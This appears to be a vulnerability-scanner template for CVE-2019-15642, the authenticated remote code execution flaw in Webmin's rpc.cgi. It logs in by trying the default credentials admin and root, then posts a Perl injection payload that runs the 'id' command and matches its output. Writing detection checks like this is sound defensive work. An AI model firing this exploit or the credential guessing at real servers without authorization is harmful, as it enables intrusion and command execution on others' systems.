id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  remediation: |
    Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
    - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
    - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
    - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-15642
    cwe-id: CWE-94
    epss-score: 0.26994
    epss-percentile: 0.96156
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: webmin
    product: webmin
    shodan-query: title:"Webmin"
  tags: cve,cve2019,webmin,rce
variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}
      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root
    stop-at-first-match: true
    host-redirects: true
    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200